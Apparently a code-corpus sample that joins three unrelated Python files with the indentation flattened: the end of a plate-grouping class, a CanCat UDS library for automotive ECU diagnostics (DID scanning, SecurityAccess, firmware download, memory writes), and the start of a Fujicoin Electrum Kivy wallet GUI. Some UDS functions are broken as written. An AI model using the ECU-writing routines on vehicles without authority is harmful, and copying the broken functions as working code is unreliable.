for group in self.groups_list:
# find and publish the most confident plate in the group
most_confident_plate = group[0]
for plate in group:
if plate.confidence > most_confident_plate.confidence:
most_confident_plate = plate
self.db_reference.write_to_database(copy.deepcopy(most_confident_plate))
self.groups_list = []
def stop(self):
self.stopped = True
def notify(self):
self.notified = True
|
__init__.py
|
from __future__ import print_function
from builtins import input
import sys
import time
import cancat
import struct
import threading
import cancat.iso_tp as cisotp
# In 11-bit CAN, an OBD2 tester typically sends requests with an ID of 7DF, and
# can accept response messages on IDs 7E8 to 7EF, requests to a specific ECU can
# be sent from ID 7E0 to 7E7. So the non-OBD2 range normally ends at 7D7,
# although I can't find a specific "standard" for this.
#
# In 29-bit CAN an OBD2 tester typically sends requests with an ID of 0x18DB33F1
# where 0x18DBxxxx indicates this is an OBD2 message, 0x33 indicates this
# message is for the OBD2 ECU(s), and 0xF1 is the tester. Normal UDS messages
# use a prefix of 0x18DAxxxx.
# 0xF1 is used as a tester address in normal UDS messaging as well.
ARBID_CONSTS = {
'11bit': {
'prefix': 0x700,
'prefix_mask': 0xF00,
'resp_offset': 8, # rxid is normally the txid + 8
'max_req_id': 0xF7,
'obd2_broadcast': 0x7DF,
},
'29bit': {
'prefix': 0x18DA0000,
'prefix_mask': 0xFFFF0000,
'destid_mask': 0x0000FF00,
'destid_shift': 8,
'srcid_mask': 0x000000FF,
'tester': 0xF1,
'obd2_broadcast': 0x18DA33F1,
}
}
ISO_14229_DIDS = {
0xF180: 'bootSoftwareIdentificationDataIdentifier',
0xF181: 'applicationSoftwareIdentificationDataIdentifier',
0xF182: 'applicationDataIdentificationDataIdentifier',
0xF183: 'bootSoftwareFingerprintDataIdentifier',
0xF184: 'applicationSoftwareFingerprintDataIdentifier',
0xF185: 'applicationDataFingerprintDataIdentifier',
0xF186: 'activeDiagnosticSessionDataIdentifier',
0xF187: 'vehicleManufacturerSparePartNumberDataIdentifier',
0xF188: 'vehicleManufacturerECUSoftwareNumberDataIdentifier',
0xF189: 'vehicleManufacturerECUSoftwareVersionNumberDataIdentifier',
0xF18A: 'systemSupplierIdentifierDataIdentifier',
0xF18B: 'ECUManufacturingDateDataIdentifier',
0xF18C: 'ECUSerialNumberDataIdentifier',
0xF18D: 'supportedFunctionalUnitsDataIdentifier',
0xF18E: 'vehicleManufacturerKitAssemblyPartNumberDataIdentifier',
0xF190: 'VINDataIdentifier',
0xF191: 'vehicleManufacturerECUHardwareNumberDataIdentifier',
0xF192: 'systemSupplierECUHardwareNumberDataIdentifier',
0xF193: 'systemSupplierECUHardwareVersionNumberDataIdentifier',
0xF194: 'systemSupplierECUSoftwareNumberDataIdentifier',
0xF195: 'systemSupplierECUSoftwareVersionNumberDataIdentifier',
0xF196: 'exhaustRegulationOrTypeApprovalNumberDataIdentifier',
0xF197: 'systemNameOrEngineTypeDataIdentifier',
0xF198: 'repairShopCodeOrTesterSerialNumberDataIdentifier',
0xF199: 'programmingDateDataIdentifier',
0xF19A: 'calibrationRepairShopCodeOrCalibrationEquipmentSerialNumberData-',
0xF19B: 'calibrationDateDataIdentifier',
0xF19C: 'calibrationEquipmentSoftwareNumberDataIdentifier',
0xF19D: 'ECUInstallationDateDataIdentifier',
0xF19E: 'ODXFileDataIdentifier',
0xF19F: 'entityDataIdentifier',
}
NEG_RESP_CODES = {
0x10:'GeneralReject',
0x11:'ServiceNotSupported',
0x12:'SubFunctionNotSupported',
0x13:'IncorrectMesageLengthOrInvalidFormat',
0x14:'ResponseTooLong',
0x21:'BusyRepeatRequest',
0x22:'ConditionsNotCorrect',
0x24:'RequestSequenceError',
0x25:'NoResponseFromSubnetComponent',
0x26:'FailurePreventsExecutionOfRequestedAction',
0x31:'RequestOutOfRange',
0x33:'SecurityAccessDenied',
0x35:'InvalidKey',
0x36:'ExceedNumberOfAttempts',
0x37:'RequiredTimeDelayNotExpired',
0x70:'UploadDownloadNotAccepted',
0x71:'TransferDataSuspended',
0x72:'GeneralProgrammingFailure',
0x73:'WrongBlockSequenceCounter',
0x78:'RequestCorrectlyReceived-ResponsePending',
0x7e:'SubFunctionNotSupportedInActiveSession',
0x7f:'ServiceNotSupportedInActiveSession',
0x81:'RpmTooHigh',
0x82:'RpmTooLow',
0x83:'EngineIsRunning',
0x84:'EngineIsNotRunning',
0x85:'EngineRunTimeTooLow',
0x86:'TemperatureTooHigh',
0x87:'TemperatureTooLow',
0x88:'VehicleSpeedTooHigh',
0x89:'VehicleSpeedTooLow',
0x8a:'ThrottlePedalTooHigh',
0x8b:'ThrottlePedalTooLow',
0x8c:'TransmissionRangeNotInNeutral',
0x8d:'TransmissionRangeNotInGear',
0x8f:'BrakeSwitchsNotClosed',
0x90:'ShifterLeverNotInPark',
0x91:'TorqueConverterClutchLocked',
0x92:'VoltageTooHigh',
0x93:'VoltageTooLow',
}
SVC_DIAGNOSTICS_SESSION_CONTROL = 0x10
SVC_ECU_RESET = 0x11
SVC_CLEAR_DIAGNOSTICS_INFORMATION = 0x14
SVC_READ_DTC_INFORMATION = 0x19
SVC_READ_DATA_BY_IDENTIFIER = 0x22
SVC_READ_MEMORY_BY_ADDRESS = 0x23
SVC_SECURITY_ACCESS = 0x27
SVC_READ_DATA_BY_PERIODIC_IDENTIFIER = 0x2a
SVC_DYNAMICALLY_DEFINE_DATA_IDENTIFIER = 0x2c
SVC_WRITE_DATA_BY_IDENTIFIER = 0x2e
SVC_INPUT_OUTPUT_CONTROL_BY_IDENTIFIER = 0x2f
SVC_ROUTINE_CONTROL = 0x31
SVC_REQUEST_DOWNLOAD = 0x34
SVC_REQUEST_UPLOAD = 0x35
SVC_TRANSFER_DATA = 0x36
SVC_REQUEST_TRANSFER_EXIT = 0x37
SVC_WRITE_MEMORY_BY_ADDRESS = 0x3d
SVC_TESTER_PRESENT = 0x3e
SVC_NEGATIVE_RESPONSE = 0x7f
SVC_CONTROL_DTC_SETTING = 0x85
UDS_SVCS = { v:k for k,v in globals().items() if k.startswith('SVC_') }
POS_RESP_CODES = { (k|0x40) : "OK_" + v.lower() for k,v in UDS_SVCS.items() }
POS_RESP_CODES[0] = 'Success'
NEG_RESP_REPR = {}
for k,v in NEG_RESP_CODES.items():
NEG_RESP_REPR[k] = 'ERR_' + v
RESP_CODES = {}
RESP_CODES.update(NEG_RESP_REPR)
RESP_CODES.update(POS_RESP_CODES)
class NegativeResponseException(Exception):
def __init__(self, neg_code, svc, msg):
self.neg_code = neg_code
self.msg = msg
self.svc = svc
def __repr__(self):
negresprepr = NEG_RESP_CODES.get(self.neg_code)
return "NEGATIVE RESPONSE to 0x%x (%s): ERROR 0x%x: %s \tmsg: %s" % \
(self.svc, UDS_SVCS.get(self.svc), self.neg_code, negresprepr, self.msg)
def __str__(self):
negresprepr = NEG_RESP_CODES.get(self.neg_code)
return "NEGATIVE RESPONSE to 0x%x (%s): ERROR 0x%x: %s \tmsg: %s" % \
(self.svc, UDS_SVCS.get(self.svc), self.neg_code, negresprepr, self.msg)
class UDS(object):
def __init__(self, c, tx_arbid, rx_arbid=None, verbose=True, extflag=0, timeout=3.0):
self.c = c
self.t = None
self.verbose = verbose
self.extflag = extflag
self.timeout = timeout
if rx_arbid == None:
rx_arbid = tx_arbid + 8 # by UDS spec
self.tx_arbid = tx_arbid
self.rx_arbid = rx_arbid
def xmit_recv(self, data, extflag=0, count=1, service=None):
msg, idx = self.c.ISOTPxmit_recv(self.tx_arbid, self.rx_arbid, data, extflag, self.timeout, count, service)
# check if the response is something we know about and can help out
if msg != None and len(msg):
svc = data[0]
svc_resp = msg[0]
errcode = 0
if len(msg) >= 3:
errcode = msg[2]
if svc_resp == svc + 0x40:
if self.verbose:
print("Positive Response!")
negresprepr = NEG_RESP_CODES.get(errcode)
if negresprepr != None and svc_resp != svc + 0x40:
if self.verbose > 1:
print(negresprepr + "\n")
# TODO: Implement getting final message if ResponseCorrectlyReceivedResponsePending is received
if errcode != 0x78: # Don't throw an exception for ResponseCorrectlyReceivedResponsePending
raise NegativeResponseException(errcode, svc, msg)
else:
# Try again but increment the start index
msg, idx = self.c._isotp_get_msg(self.rx_arbid, start_index = idx+1, service = service, timeout = self.timeout)
return msg
def _do_Function(self, func, data=None, subfunc=None, service=None):
if subfunc != None:
omsg = struct.pack('>BB', func, subfunc)
else:
omsg = struct.pack('>B', func)
if data != None:
omsg += data
msg = self.xmit_recv(omsg, extflag=self.extflag, service=service)
return msg
def SendTesterPresent(self):
while self.TesterPresent is True:
if self.TesterPresentRequestsResponse:
self.c.CANxmit(self.tx_arbid, "023E000000000000".decode('hex'))
else:
self.c.CANxmit(self.tx_arbid, "023E800000000000".decode('hex'))
time.sleep(2.0)
def StartTesterPresent(self, request_response=True):
self.TesterPresent = True
self.TesterPresentRequestsResponse=request_response
self.t = threading.Thread(target = self.SendTesterPresent)
self.t.setDaemon(True)
self.t.start()
def StopTesterPresent(self):
self.TesterPresent = False
if self.t is not None:
self.t.join(5.0)
if self.t.isAlive():
if self.verbose:
print("Error killing Tester Present thread")
self.t = None
def DiagnosticSessionControl(self, session):
currIdx = self.c.getCanMsgCount()
return self._do_Function(SVC_DIAGNOSTICS_SESSION_CONTROL, chr(session), service=0x50)
def ReadMemoryByAddress(self, address, size):
currIdx = self.c.getCanMsgCount()
return self._do_Function(SVC_READ_MEMORY_BY_ADDRESS, subfunc=0x24, data=struct.pack(">IH", address, size), service = 0x63)
#return self.xmit_recv("\x23\x24" + struct.pack(">I", address) + struct.pack(">H", size), service = 0x63)
def ReadDID(self, did):
'''
Read the Data Identifier specified from the ECU.
Returns: The response ISO-TP message as a string
'''
msg = self._do_Function(SVC_READ_DATA_BY_IDENTIFIER, struct.pack('>H', did), service=0x62)
#msg = self.xmit_recv("22".decode('hex') + struct.pack('>H', did), service=0x62)
return msg
def WriteDID(self, did, data):
'''
Write the Data Identifier specified from the ECU.
Returns: The response ISO-TP message as a string
'''
msg = self._do_Function(SVC_WRITE_DATA_BY_IDENTIFIER,struct.pack('>H', did) + data, service=0x62)
#msg = self.xmit_recv("22".decode('hex') + struct.pack('>H', did), service=0x62)
return msg
def RequestDownload(self, addr, data, data_format = 0x00, addr_format = 0x44):
'''
Assumes correct Diagnostics Session and SecurityAccess
'''
# Figure out the right address and data length formats
pack_fmt_str = ">BB"
try:
pack_fmt_str += {1:"B", 2:"H", 4:"I"}.get(addr_format >> 4) + {1:"B", 2:"H", 4:"I"}.get(addr_format & 0xf)
except TypeError:
print("Cannot parse addressAndLengthFormatIdentifier", hex(addr_format))
return None
msg = self.xmit_recv("\x34" + struct.pack(pack_fmt_str, data_format, addr_format, addr, len(data)), extflag=self.extflag, service = 0x74)
# Parse the response
if msg[0] != 0x74:
print("Error received: {}".format(msg.encode('hex')))
return msg
max_txfr_num_bytes = msg[1] >> 4 # number of bytes in the max tranfer length parameter
max_txfr_len = 0
for i in range(2,2+max_txfr_num_bytes):
max_txfr_len <<= 8
max_txfr_len += msg[i]
# Transfer data
data_idx = 0
block_idx = 1
while data_idx < len(data):
msg = self.xmit_recv("\x36" + chr(block_idx) + data[data_idx:data_idx+max_txfr_len-2], extflag=self.extflag, service = 0x76)
data_idx += max_txfr_len - 2
block_idx += 1
if block_idx > 0xff:
block_idx = 0
# error checking
if msg is not None and msg[0] == 0x7f and msg[2] != 0x78:
print("Error sending data: {}".format(msg.encode('hex')))
return None
if msg is None:
print("Didn't get a response?")
data_idx -= max_txfr_len - 2
block_idx -= 1
if block_idx == 0:
block_idx = 0xff
# TODO: need to figure out how to get 2nd isotp message to verify that this worked
# Send RequestTransferExit
self._do_Function(SVC_REQUEST_TRANSFER_EXIT, service = 0x77)
def readMemoryByAddress(self, address, length, lenlen=1, addrlen=4):
'''
Work in progress!
'''
if lenlen == 1:
lfmt = "B"
else:
lfmt = "H"
lenlenbyte = (lenlen << 4) | addrlen
msg = self._do_Function(SVC_READ_MEMORY_BY_ADDRESS, data=struct.pack('<BI' + lfmt, lenlenbyte, address, length), service=0x63)
return msg
def writeMemoryByAddress(self, address, data, lenlen=1, addrlen=4):
'''
Work in progress!
'''
if lenlen == 1:
lfmt = "B"
else:
lfmt = "H"
lenlenbyte = (lenlen << 4) | addrlen
data = struct.pack('<BI' + lfmt, lenlenbyte, address, length)
#data = "3d".decode('hex') + struct.pack('<BI' + lfmt, lenlenbyte, address, length)
msg = self._do_Function(SVC_WRITE_MEMORY_BY_ADDRESS, data=data, service=0x63)
#msg = self.xmit_recv(data, service=0x63)
return msg
def RequestUpload(self, addr, length, data_format = 0x00, addr_format = 0x44):
'''
Work in progress!
'''
msg = self._do_Function(SVC_REQUEST_UPLOAD, subfunc=data_format, data = chr(addr_format) + struct.pack('>I', addr)[1:] + struct.pack('>I', length)[1:])
sid, lfmtid, maxnumblocks = struct.unpack('>BBH', msg[:4])
output = []
for loop in maxnumblocks:
msg = self._do_Function(SVC_TRANSFER_DATA, subfunc=loop)
output.append(msg)
if len(msg) and msg[0] != '\x76':
print("FAILURE TO DOWNLOAD ALL. Returning what we have so far (including error message)")
return output
msg = self._do_Function(SVC_REQUEST_TRANSFER_EXIT)
if len(msg) and msg[0] != '\x77':
print("FAILURE TO EXIT CLEANLY. Returning what we received.")
return output
def EcuReset(self, rst_type=0x1):
return self._do_Function(SVC_ECU_RESET, subfunc=rst_type)
def ClearDiagnosticInformation(self):
pass
def ReadDTCInfomation(self):
pass
def ReadDataByPeriodicIdentifier(self, pdid):
pass
def DynamicallyDefineDataIdentifier(self):
pass
def InputOutputControlByIdentifier(self, iodid):
pass
def RoutineControl(self, rid):
pass
def TransferData(self, did):
pass
def RequestTransferExit(self):
pass
def ControlDTCSetting(self):
pass
def ScanDIDs(self, start=0, end=0x10000, delay=0):
success = []
try:
for x in range(start, end):
try:
if self.verbose:
sys.stderr.write(' %x ' % x)
val = self.ReadDID(x)
success.append((x, val))
except KeyboardInterrupt:
raise
except Exception as e:
if self.verbose > 1:
print(e)
time.sleep(delay)
except KeyboardInterrupt:
print("Stopping Scan during DID 0x%x " % x)
return success
return success
def SecurityAccess(self, level, key = ""):
"""Send and receive the UDS messages to switch SecurityAccess levels.
@level = the SecurityAccess level to switch to
@key = a SecurityAccess algorithm specific key
"""
msg = self._do_Function(SVC_SECURITY_ACCESS, subfunc=level, service = 0x67)
if msg is None:
return msg
if msg[0] == 0x7f:
print("Error getting seed:", msg.encode('hex'))
else:
seed = msg[2:]
hexified_seed = " ".join(x.encode('hex') for x in seed)
key = str(bytearray(self._key_from_seed(hexified_seed, key)))
msg = self._do_Function(SVC_SECURITY_ACCESS, subfunc=level+1, data=key, service = 0x67)
return msg
def _key_from_seed(self, seed, secret):
"""Generates the key for a specific SecurityAccess seed request.
@seed = the SecurityAccess seed received from the ECU. Formatted
as a hex string with spaces between each seed byte.
@secret = a SecurityAccess algorithm specific key
Returns the key, as a string of key bytes.
"""
print("Not implemented in this class")
return 0
def printUDSSession(c, tx_arbid, rx_arbid=None, paginate=45):
if rx_arbid == None:
rx_arbid = tx_arbid + 8 # by UDS spec
msgs = [msg for msg in c.genCanMsgs(arbids=[tx_arbid, rx_arbid])]
msgs_idx = 0
linect = 1
while msgs_idx < len(msgs):
arbid, isotpmsg, count = cisotp.msg_decode(msgs, msgs_idx)
#print("Message: (%s:%s) \t %s" % (count, msgs_idx, isotpmsg.encode('hex')))
svc = isotpmsg[0]
mtype = (RESP_CODES, UDS_SVCS)[arbid==tx_arbid].get(svc, '')
print("Message: (%s:%s) \t %-30s %s" % (count, msgs_idx, isotpmsg.encode('hex'), mtype))
msgs_idx += count
if paginate:
if (linect % paginate)==0:
input("%x) PRESS ENTER" % linect)
linect += 1
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'fujicoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('fujicoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for fujicoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
